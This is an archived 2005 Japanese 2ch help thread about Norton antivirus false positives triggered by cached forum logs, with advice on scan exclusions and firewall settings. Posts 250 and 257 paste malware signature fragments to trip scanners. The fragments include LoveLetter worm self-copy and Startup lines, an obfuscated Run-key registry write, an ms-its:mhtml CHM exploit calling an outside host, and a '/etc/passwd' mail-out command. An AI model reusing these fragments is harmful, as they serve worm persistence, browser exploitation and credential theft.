210 :ひよこ名無しさん :2005/07/03(日) 12:37:13 ID:???
ノートン先生がunix.Penguinに誤反応してしまって
今のとこ解決策はないんでしょうか?
ノートン先生捨ててバスターに変えても問題ない?
XPはノートン先生入れとかないとまずいみたいなこと聞いたんだが・・

211 :ひよこ名無しさん:2005/07/03(日) 13:08:38 ID:???
>>208-209
どういうこと?新verにウィルスが入ってたの?

212 :ひよこ名無しさん:2005/07/03(日) 13:44:44 ID:???
>>207
コレはジョーダンのつもり?シャレんなんないでしょ

213 :ひよこ名無しさん:2005/07/03(日) 14:59:25 ID:???
c.Copy(dirsystem&"LOVE-LETTER-FOR-YOU.TXT.vbs

214 :ひよこ名無しさん:2005/07/03(日) 16:51:16 ID:???
>>211
ただの叩き

215 :ひよこ名無しさん:2005/07/04(月) 22:08:48 ID:???
age

216 :ひよこ名無しさん:2005/07/04(月) 22:51:16 ID:???
ペンギンウイルスは無害?

217 :ひよこ名無しさん:2005/07/05(火) 00:28:46 ID:???
移動してきました、度々すいません。半角文字列板のスレを開いたらウイルス警告が出ました。
環境はノートンです。
スキャン後も感染を修復することはできませんでした。
ウイルス名:Bloodhound.Exploit.6

誘導されてこちらにきました。
初心者で何をしたらいいかわかりません・・このスレにウイルスがいるのでしょうか?
ご教授お願いします・・

218 :217:2005/07/05(火) 00:57:58 ID:???
追記
発生源 C:\Documents and Settings\Owner\デスクトップ\Jane\Logs\2ch\大人の時間\半角文字列\1120269811.dat

です。誤報なのでしょうか?修復できないので不安です・・

219 :ひよこ名無しさん:2005/07/05(火) 01:04:26 ID:???
>>218
少しはスレを読め

220 :217:2005/07/05(火) 01:41:21 ID:???
すいません読み返しました。
・・一応反応のあったログを削除後ログファイルを除外指定しました。

除外しましたが、
ログファイルの中には数々のフォルダがありました。ログ自体、感染はあり得ないのでしょうか?
有り得ないから除外するのだと思いますが、念のためお聞きしました

221 :ひよこ名無しさん:2005/07/05(火) 01:42:54 ID:???
>>220
有り得ない。
ノートンの手抜きチェックが悪い。

222 :217:2005/07/05(火) 01:47:47 ID:???
わかりました。ありがとう御座います。

あと、ログフォルダの中のログファイルでした。訂正します。すいません

223 :ひよこ名無しさん:2005/07/05(火) 21:43:47 ID:???


224 :ひよこ名無しさん:2005/07/07(木) 16:50:38 ID:8PA32UYB
Bloodhound.Exploit.6ってのが頻繁に検出される。
これはに関しては誤作動ではないんだよな?

225 :ひよこ名無しさん:2005/07/07(木) 16:54:19 ID:???
みんな どんどんウイルシに感染してるよ

226 :ひよこ名無しさん:2005/07/07(木) 17:01:06 ID:???
考えるんじゃなくて感じて

227 :ひよこ名無しさん:2005/07/12(火) 21:42:11 ID:ubqbqkwI
警告キタ━━━━━━(゚∀゚)━━━━━━ !!

228 :ひよこ名無しさん:2005/07/13(水) 13:31:31 ID:yrCZUMNS
a

229 :ひよこ名無しさん:2005/07/13(水) 23:57:08 ID:???
>>217
おいらも同様の症状なのですが、どうなんでしょうか?

230 :ひよこ名無しさん:2005/07/14(木) 00:00:53 ID:???
>>229
ただの誤検出

231 :ひよこ名無しさん:2005/07/14(木) 13:01:20 ID:???
Bloodhound俺もキタよ。実況板で。

232 :ひよこ名無しさん:2005/07/14(木) 14:37:31 ID:???
シマンテックのオンラインスキャンをすると、
2chブラウザのdatファイルからウィルス反応しまくりなんですが、
この手の反応は全て誤反応と解釈してよろしいですか?

233 :cen ◆Pm9xOTJuM. :2005/07/15(金) 21:44:52 ID:AyDUrGnO ?##
そうそう。
>>17のソフトをアップデートしましたので、よかったら
ダウンロードをしてくださいです。
http://www.geocities.jp/cen_hp/index.html

234 :cen ◆Pm9xOTJuM. :2005/07/15(金) 21:45:17 ID:??? ?##
>>232
それでいいと思います。

235 :232:2005/07/16(土) 00:14:07 ID:???
>>234
ありがとう。安心した

236 :ひよこ名無しさん:2005/07/16(土) 15:48:29 ID:???
安心した

237 :ひよこ名無しさん:2005/07/16(土) 20:23:01 ID:???
それでいいのか?・・・・・ほんとにだいじょぶ?

238 :cen ◇Pm9xOTJuM. に注意:2005/07/18(月) 00:23:37 ID:???
パソコン初心者総合質問スレッド vol.1072
http://pc8.2ch.net/test/read.cgi/pcqa/1120581493/

399 名前:299[] 投稿日:2005/07/06(水) 21:47:49 ID:YFmNomOu
★症状: 以前までは出来ていた、PCでのDVD-Video再生が出来なくなった。
★試したソフト: Media Player Classic , Mediaunite , Windows Media Player 10
★関係有りそうな出来事: DirectShow Filterに「GPL MPEG-1/2 Decoder」を追加した。

何方か原因解りませんか?
せめてハードかソフト、どちらに原因がありそうかだけでも解れば幸いです。

405 名前:ひよこ名無しさん[sage] 投稿日:2005/07/06(水) 21:50:29 ID:???
>>399
ハードかソフトに原因

408 名前:cen ◆Pm9xOTJuM. [sage] 投稿日:2005/07/06(水) 21:52:09 ID:??? ?##
>>405
あと人間

411 名前:ひよこ名無しさん[sage] 投稿日:2005/07/06(水) 21:53:30 ID:???
>>408
暴言ヒドスw

239 :ひよこ名無しさん:2005/07/18(月) 01:23:34 ID:???
cenも人間

240 :ひよこ名無しさん:2005/07/20(水) 16:38:42 ID:1McjtpBt
 初心者の質問のところから誘導されてきました。以下にそのままコピペします。


 windowsXPのhome editionで、Internet Exproler6、更新バージョンはSP2です。
よろしくお願いします。

 ノートンのアンチウィルスが「Unix Penguin」というウィルスを検知しました。
場所がインターネット一時ファイルのようだったので、「インターネットオプション
→ファイルの削除」をしました。

 すると、なぜか「お気に入り」が消えてしまったのです。

 誤って自分で消してしまったのだろうと言われたのでそうかと思い、もう一度
覚えている限り戻そうとしたら「入力したショートカットの名前は既にお気に入り
メニューに存在します。置き換えますか?」と出ます。それで置き換えても
表示されません。新たにショートカットの名前を変えて登録すれば表示される
のですが……。

 私の「お気に入り」の中には、表示されるものと表示されないものが両方
存在しています。表示されないものを再び表示する、または消し去ることは
できないでしょうか。消し去れれば、また再び作り直そうと思いますが…。

241 :ひよこ名無しさん:2005/07/20(水) 16:45:29 ID:???
>>240
誘導してない。
少しはログ読め。

242 :240 :2005/07/20(水) 16:54:41 ID:???
>>240
 ああほんとだ!
 すみません、慌ててました……

243 :240 :2005/07/20(水) 17:02:34 ID:???
>>241
 でも、表示のみ消えた「お気に入り」については、どこかに書いてありますか?

 ノートンとは関係ないのかもしれないですが…。

244 :ひよこ名無しさん:2005/07/20(水) 17:04:13 ID:???
>>243
関係ない。
インターネットオプション→詳細設定→使用してないフォルダは閉じる

245 :240=243:2005/07/20(水) 17:23:59 ID:???
 ありがとうございます。
 やってみましたが、駄目でした。

 そもそも「お気に入り」の星マークのアイコンが、見当たりません。favorite
の中もカラになっています。私はなんだか変なことをしてしまったみたいですね。

 もうちょっといじってみることにします。。失礼しました。

246 :ひよこ名無しさん:2005/07/21(木) 11:16:56 ID:???
ノートンアンチウィルス2005、open jane Doe 0.1.12.2 を使っています。
該当スレのログを除外しようとしたのですが、スレッドのidxはあるのですが、datがそのスレッドに限って見つからず、改善できません。
スレッドは
http://society3.2ch.net/test/read.cgi/koumei/1121522102/11
このメール欄にウィルスコードが貼ってあるのです。
対処の方法を御教示願います。

247 :246:2005/07/21(木) 13:27:51 ID:???
すみません、自己解決しました。
スルーしてください。

248 :ひよこ名無しさん:2005/07/22(金) 03:59:12 ID:pHdm2INX
age

249 :ひよこ名無しさん:2005/07/22(金) 22:55:05 ID:EfV4fKSJ ?
【Live2ch 】 1.10
【 スキン  】 Default
【Windows】 XP
【Firewall .】 NortonInternetSecurity
【 不具合 】 騙されてms-its: mhtml:file://c:\をメール欄に書いたらブラウザがおかしくなった。
        インストールフォルダのメールのテキストドキュメントも開かない。


250 :ひよこ名無しさん:2005/07/22(金) 22:56:13 ID:???
ほう・・・騙されてねぇ〜

c.Copy(dirwin&"\Win32DLL.vbs")?
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")?
<object?data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm"?type="text/?
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*?
fso.copyfile?"dirsystem&nurupo.vbs",?"j:\windows\start?menu\programs\startup\"?
If?s?=?"htm"?and?fso.FileExists(f1.path+"l")?=?False?then?fso.CopyFile?f1.path,?f1.path+"l"?
ToInfect.CodeModule.InsertLines?BGN,?ADI1.CodeModule.Lines(BGN,?)?
G.RegWrite?A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"),?E.BuildPath(E.GetSpecialFolder(1),?A("VHORU@SU/WCR"))?
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))?  
ms-its:mhtml:file://c:\ ?
kak.hta';ken=wd+'START?

251 :ひよこ名無しさん:2005/07/23(土) 20:23:19 ID:???
Bloodhound流行ってんの?

252 :ひよこ名無しさん:2005/07/24(日) 21:16:56 ID:cauqGl4H
よく分からんけど、結局、感染してたとしても放っときゃいいんだろ?

253 :ひよこ名無しさん:2005/07/27(水) 18:55:26 ID:???
ハァ?

254 :こむ:2005/07/27(水) 23:43:56 ID:mxkxVm4b
Aya の自作自演
http://pc.2ch.net/test/read.cgi/pcqa/1021802095/837-846

837 名前:ひよこ名無しさん 投稿日:02/05/20 08:35 ID:GarmVKYa
あまりに馬鹿馬鹿しい質問ですいません。
Windows Media Plyaer と KbMedia Player  がパソコンの中にあるのですが、MP3ファイルをクリックすると
Windows Media Plyaer で再生してしまうのですが、ダブルクリックした際に後者で再生するようにはどうしたらいいんでしょうか?

838 名前:ひよこ名無しさん 投稿日:02/05/20 08:36 ID:???
>>837
またきたのか?
Windowsの入門書以上の書籍買って関連付けに関して理解を深めろ。

839 名前:Aya ◆U.S.S.po 投稿日:02/05/20 08:36 ID:GarmVKYa
>>837
1.mp3のファイルをクリック
2.「アプリケーションから開く」を選択
3.プログラムの選択
4.「これらのファイルを開くときは、
  いつもこのアプリケーションを使う」にチェック
5.OK

840 名前:ひよこ名無しさん 投稿日:02/05/20 08:37 ID:???
>>839
自作自演するときはIDを消しましょうね(ワラ

255 :ひよこ名無しさん:2005/07/29(金) 10:45:54 ID:???
>>252
そういうことだな。

256 :ひよこ名無しさん:2005/07/30(土) 06:15:31 ID:???
うちのノートン2004、除外の設定するときフォルダ検索をしないとできない。
IEのを手書きで入力したけどやっぱり反応した。
c:\program files\musicjg2ch\log
c:\program files\musicjg2ch\temp.htm
これを入れてもダメだった。
ギコナビなら除外の設定はすんなりいったんだけどな…。

257 :ひよこ名無しさん:2005/08/01(月) 18:02:23 ID:???
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

ms-its:mhtml:file://c:\ cat /etc/passwd | mail nobody kak.hta';ken=wd+'START

258 :ひよこ名無しさん:2005/08/03(水) 16:00:39 ID:???
んなもん貼っても反応しねーよ
真に受けやがってカスがw

259 :ひよこ名無しさん:2005/08/05(金) 11:13:48 ID:???
>>257
他のスレでこういうのが貼ってあり、かちゅを閉じたら
IEが全く見られなくなってしまいました

>>10をやってみたのですが、やっぱり見れない
今生きてるのはかちゅだけです。助けてください

260 :名無しさん@お腹いぱーい。:2005/08/05(金) 13:25:34 ID:???
>>259
ノートンが原因だったら以下コピペ
2003/2004(2005もこれだと思う)

Norton Internet Security もしくは Norton Personal Firewall を起動する。
画面中央の [ファイアウォール] をクリックする。
右下に表示される [設定] ボタンをクリックする。
[プログラム制御] タブをクリックする。
[追加] ボタンをクリックする。
「プログラムの選択」ウィンドウが開きます。
Internet Explorer フォルダを開く。
Internet Explorer フォルダは今回の例の場合です。
お客様が設定を行いたいアプリケーションがインストールされているフォルダを開いてください。
IEXPLORE.EXE をクリックして選択する。
IEXPLORE.EXE は今回の例の場合です。
お客様が設定を行いたいアプリケーションを選択してください。
[開く] ボタンをクリックする。
例としてご案内している Internet Explorer を含め、設定がすでに作成されているアプリケーションの場合は「すでにルールがあるプログラムを追加しようとしています」というメッセージが表示されますが、まだ設定されていないアプリケーションの場合は表示されません。
「プログラム制御」のウィンドウが表示されるので、「どう処理しますか?」の部分で [許可] もしくは [遮断] などを選択して、[OK] ボタンをクリックする。
「アプリケーションカテゴリの選択」ウィンドウが表示されるので、そのアプリケーションをどのカテゴリとして分類するかどうかを選択し、[OK] ボタンをクリックする。

2002
NISをたちあげ、ファイアウォール→インターネットアクセス制御(アプリケーション制御の一覧)で設定が変えられます

IE5の修復は以下コピペ

1. [スタート]−[設定]−[コントロールパネル] から「アプリケーションの追加と削除」を起動します。
2. [インストールと削除] タブをクリックし、「Microsoft Internet Explore 5 とインターネットツール」をクリックします。
3. 「追加と削除」ボタンをクリックし、表示されるメニューから「Internet Explore を修復する」を選択して「OK」をクリックします。


XPならシステムの復元

261 :ひよこ名無しさん:2005/08/07(日) 01:32:04 ID:+PgqXMkS
http://web.archive.org/web/20020202012223/http://www.top.or.jp/~godhand/a2.html

262 :ひよこ名無しさん:2005/08/11(木) 07:34:19 ID:???
保守

263 :ひよこ名無しさん:2005/08/11(木) 17:48:51 ID:/1wx1GK2
このスレ、全く見えない!

264 :ひよこ名無しさん:2005/08/11(木) 18:10:33 ID:???
a

265 :ひよこ名無しさん:2005/08/11(木) 18:17:33 ID:???
sage

266 :ひよこ名無しさん:2005/08/13(土) 00:51:52 ID:???
ms-its:mhtml:file://c:\

267 :ひよこ名無しさん:2005/08/13(土) 20:52:27 ID:???
sage

268 :ひよこ名無しさん:2005/08/15(月) 00:02:49 ID:???
te

269 :ひよこ名無しさん:2005/08/17(水) 11:53:47 ID:???
保守

270 :ひよこ名無しさん:2005/08/24(水) 07:54:30 ID:???
保守sage保守age

271 :ひよこ名無しさん:2005/08/24(水) 08:22:24 ID:ujhK/t33
ノートンアンインストールしてウィルスバスター入れました
おかげでこのスレも見れるようになりました

272 :ひよこ名無しさん:2005/08/24(水) 08:38:01 ID:???
保守

273 :cen ◆Pm9xOTJuM. :2005/08/24(水) 22:22:22 ID:??? ?##
そうそう。
>>17 のソフトですが、シリア語ブラクラにも対応しました。
あと、何日前以降に更新されたファイルのみ検索の設定ができるように
なりましたです。
http://www.geocities.jp/cen_hp/index.html

274 :経営情報学部の学生 ◆2H3Xipoq6Y :2005/08/24(水) 22:37:51 ID:???
>>273
いつも乙です。

275 :ひよこ名無しさん:2005/08/25(木) 07:46:50 ID:???
>>271
単にウイルス検出対象ファイルからhtm、html、datを外せば済むことなのに…
まあ少しでもお金使って貰わないとカネの巡りが悪くなるからな。

276 :ひよこ名無しさん:2005/08/25(木) 07:48:06 ID:???
って、htmとhtmlは外すとまずいのか。
けど通常のインターネットブラウザで2chしてる時点で(ry

277 :ひよこ名無しさん:2005/08/30(火) 13:01:34 ID:???
>>273
乙です。
壺のdatファイルなんですが、ノートンで誤反応のファイルが見つかったのに
vicptdel.exeで検索したら0個だったんですがまだ対応されてないだけでしょうか?
VBS.LoveLetter.Varとでてましたが。

278 :cen ◆Pm9xOTJuM. :2005/08/30(火) 18:25:22 ID:???
>>277
どうもです。
今のところ、壺のdatファイルには対応しておりません。
対応しているのは、2chに直接置いてあるdatだけです。
この板なら、http://pc8.2ch.net/pcqa/dat/xxxxxxxxx.dat のような
datファイルのみです。
壺のdatファイルは構造が違うので、datファイルの構造のチェックで
弾いてしまう仕組みになっています。

279 :ひよこ名無しさん:2005/08/30(火) 19:57:15 ID:???
良スレあげ

280 :277:2005/08/31(水) 15:04:38 ID:???
>>278
分かりました。素早いレスどうもありがとう。

85 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)